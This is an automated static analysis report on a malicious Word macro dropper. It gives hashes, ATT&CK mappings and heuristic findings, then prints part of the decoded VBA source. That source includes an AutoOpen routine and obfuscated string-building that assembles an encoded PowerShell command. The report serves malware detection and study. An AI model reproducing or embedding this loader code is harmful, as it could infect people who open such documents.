Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 61c31bc684cdca57…

MALICIOUS

Office (OLE)

Size: 242.0 KB
Created: 2018-07-05 16:21:00
Authoring application: Microsoft Office Word
First seen: 2018-07-27
MD5: 03146027361568a823d94f5eeb608e46
SHA-1: c085ad53184e35fc7d9fc047d51b2f53a01082bb
SHA-256: 61c31bc684cdca57e9dc59e9fcdce28009d2cbeaefe90cb168c6331650761c63
Risk Score: 342

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro initiates execution, utilizing CreateObject and Shell calls. Notably, the script constructs a PowerShell command by concatenating strings, including "powershell", "VerBOsEP", "rEfErEncE", and ".Tost" + "rInG" + "[1,3]" + "'X" + "'-JOIN", which likely aims to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature as a dropper.

Heuristics (9)

  • ClamAV: Doc.Dropper.Agent-6602068-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6602068-0
  • VBA macros detected [medium] OLE_VBA_MACROS (5 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15879 bytes
SHA-256: 01847ca4beda634f7ce362f61eb6e12988580eaca976eda2292e5ee5dab836ae

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "oivMGmDz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   zuKNwq = (71996 - YofcqA + (hTUiv * MGiib - 59692 * wOnhvH))
   LcPqd = (50851 - zZdhF + (jjlNE * lnciVL - 8705 * KAzjja))
   qEnRf = (19862 - JFtaL + (hCUrQ * ljztfY - 97373 * zbzwip))
   ZmLafT = (49137 - ltMcwd + (SmvlsL * thRLh - 16154 * vVBrVu))
UzazTtQohw (GSzDQwMP + MnbFpHjzD + iLoBnodE + zihdj)
   FQYRu = (60166 - PwwHjr + (bzVQtd * TlRhp - 46581 * lcikN))
   VUtONv = (4668 - jAOEa + (uzdLb * mfHkF - 13591 * iVPXSR))
End Sub


Attribute VB_Name = "ccCfiGG"
Function GSzDQwMP()
On Error Resume Next
RAdhMi = (11112 - ZJhGT - rSUDD / wvAzHi) - 6172 / DrkafV - 66306 / wtJbPu / (MCvPhZ - uNAbkV + 80 + ZdbKDi)
   wlAYW = (50583 - qZPMAL - auPCJ / tuEDK) - 28553 / nkOYz - 13642 / UDjXZa / (WQsrz - kJpTzp + 75231 + BhwNH)
   GKqNtk = (70059 - NrdjR - iLLLY / duvZJ) - 38410 / SWkJR - 9298 / PFCiF / (AmbbV - VBWVk + 3727 + BRMORD)
jVFET = "wershell" + "      " + "        " + "     " + "& " + Chr(40) + " $VE" + "rBOsEP" + "rEfErEncE"
zLPzC = (98642 - AOFjLN - oVnhp / oHLMMR) - 94689 / jwuiN - 62650 / ztAiKX / (fIRhTq - jaFDAL + 83683 + ClkCj)
   zlFUau = (52543 - EwowMS - VKwWZ / kMlUT) - 61315 / EqPnv - 40573 / wUZTT / (rjXLh - KGptl + 3347 + WNYTAG)
   iNiAAr = (1791 - AkcDA - EpZmG / uOzim) - 27189 / EYBZNF - 96853 / SoLjW / (hpIIw - JJjtNA + 86915 + PQENms)
EJZLGmibU = ".Tost" + "rInG" + Chr(40) + Chr(41) + "[1,3]" + Chr(43) + "'X" + "'-JOIN" + "''" + Chr(41) + Chr(40) + " " + Chr(40) + " " + "[ChaR" + "[]] " + Chr(40) + " 120 , 4"
zszhHN = (87540 - QJdPqG - iWuWzu / liMNVS) - 81971 / UBlsb - 15618 / TnnXSs / (JZnvwG - EzYzG + 14168 + Utsbq)
   cizfqi = (4748 - jZbAn - naaVk / QBMvV) - 1456 / zuvwcw - 16274 / vpQGbC / (QzWFTw - TRFGjY + 52442 + CJpwC)
   Fzjjr = (53439 - CiYGcC - iwGZAX / bMUwwr) - 28297 / InRPzL - 69361 / HkHnCY / (FPzGHm - JQsWdk + 22841 + ukYIWk)
   FjuLw = (79657 - klCkOj - kHIMdB / bizbX) - 80733 / OuCrR - 4698 / WNawUX / (kbAzA - ARAJGn + 79944 + BvkbzW)
CzCitdb = "0 ,31,31," + " 97," + "50 ," + " 57, 43 ," + " 113,51 " + ", 62 ,54 " + ",57, 63,4" + "0, 124 ," + " 18 , 57" + " ,40, 1"
zEfork = (19529 - JMSkN - PhhSb / rVQkFd) - 75804 / QcAkc - 43381 / BnKpi / (pwTFq - ctIRk + 72332 + ldnvj)
   DwjMhH = (82257 - OtXds - CYwiO / KMILQ) - 98549 / ltNsa - 51509 / DqQHXi / (afOuG - ojEqRU + 79892 + rqVwip)
tVMvaQZHWH = "14 , 11" + ", 57,62" + ", 31 ,48" + " ,53,57,5" + "0, 40,103" + ", 120 " + ", 18,53, " + "43,97 "
BwCGR = (22047 - oGjLk - tQJGdC / XbGlzM) - 230 / LpsIQi - 25875 / DmXXvB / (oiBJw - mcMCU + 56953 + qRHFL)
   RnCTCj = (36410 - TGitV - RGzDD / ZMjFwA) - 75952 / miSMi - 47389 / BbiGQl / (IGYaIJ - KKBHW + 7828 + HzXCs)
zsmzdOlu = ",123,5" + "2,40" + ", 40" + ", 44 " + ",102,115," + " 115 ,4"
nSLwXQ = (59631 - wnFsE - hWsij / TQELUo) - 88662 / LEXaMT - 35893 / PMlIf / (FURLAh - AJObr + 42176 + OzbiW)
DjTXL = "3, 43" + " ,43, 114" + ", 56,51" + " ,63 ,59 " + ",53," + " 52," + " 51 ,49" + ",50, 61," + " 37,1" + "14, 51 ,"
kEmth = (33096 - JcmEk - ldZjn / dUCBwJ) - 68610 / Tzjazk - 31086 / PvsHNM / (CtIlO - DaZInv + 86070 + Dokzjs)
   PifkHc = (13151 - sbvXKj - JoMPKu / wUzur) - 29864 / DlfrNF - 75067 / PanudW / (wwNiG - uJltw + 13444 + KnMkrw)
   QjwiGd = (46789 - bQRmwY - hMJRIc / zRwGUc) - 27581 / ChhLf - 34505 / AzpWX / (dfUhl - iYhijN + 42898 + fjzIwX)
CQPEwKLSCNI = "46, 59" + " ,115" + ", 13, 53" + ", 109, 48" + " ,5,31" + " ,19" + " ,115 ,28" + " , 52 ,4" + "0 , 40 ,4" + "4, 102, " + "115 "
GSzDQwMP = jVFET + EJZLGmibU + CzCitdb + tVMvaQZHWH + zsmzdOlu + DjTXL + CQPEwKLSCNI
   FAEqN = (57542 - jXRwzH - XVrQZG / LoXMM) - 12417 / JjTOG - 63711 / kJDpw / (bQdwiv - Mbockp + 89357 + LjdAXi)
   wisanm = (22493 - acYquL - iRHvhs / iRmIZd) - 49030 / ZzEafO - 79859 / LZQAC / (QDzAF - jPnpzH + 7477 + ofNiOl)
End Function
Function MnbFpHjzD()
... (truncated)